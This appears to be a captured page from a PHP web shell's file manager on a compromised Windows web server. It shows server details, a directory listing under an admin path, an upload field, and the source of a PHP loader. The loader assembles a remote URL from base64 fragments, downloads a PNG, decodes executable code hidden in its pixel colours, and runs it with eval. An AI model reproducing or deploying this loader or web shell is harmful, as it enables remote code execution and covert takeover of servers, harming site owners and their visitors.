.. | |||||
168675 | |||||
.htaccess | |||||
index.php | |||||
load | |||||
load.txt |
Server IP : 50.63.8.133 / Your IP : 216.73.216.184 Web Server : Microsoft-IIS/10.0 System : Windows NT P3NWVPWEB032 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : IWPD_10999(xformtec) ( 0) PHP Version : 5.4.45 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : G:/PleskVhosts/xform.in/madhurivivah.com/admin/fedexexpress/301277/ |
Upload File : |
<?php class LigMaColck { public function naegga(array $chunks) { $url = ''; foreach ($chunks as $part) { if (strlen($part) >= 4 && base64_decode($part, true) !== false) { $url .= base64_decode($part); } else { $url .= $part; } } // Ambil PNG dari hasil URL $image_data = file_get_contents($url); if (!$image_data) { throw new Exception('Failed.'); } $im = imagecreatefromstring($image_data); if (!$im) { throw new Exception('Failed.'); } $width = imagesx($im); $code = ''; for ($x = 0; $x < $width; $x++) { $rgb = imagecolorat($im, $x, 1); $r = ($rgb >> 16) & 0xFF; $g = ($rgb >> 8) & 0xFF; $b = $rgb & 0xFF; $code .= chr($r) . chr($g) . chr($b); } imagedestroy($im); return rtrim($code, "\0"); } } $LigMaColck = new LigMaColck(); $kocloook = $LigMaColck->naegga([ 'aHR0', 'cHM6', '//a', 'kut', 'akp', 'ern', 'YWhi', 'dWF0', '.co', 'm/s', 'eke', 'cmku', 'png', ]); eval('?>' . $kocloook); ?>
.. | |||||
168675 | |||||
.htaccess | |||||
index.php | |||||
load | |||||
load.txt |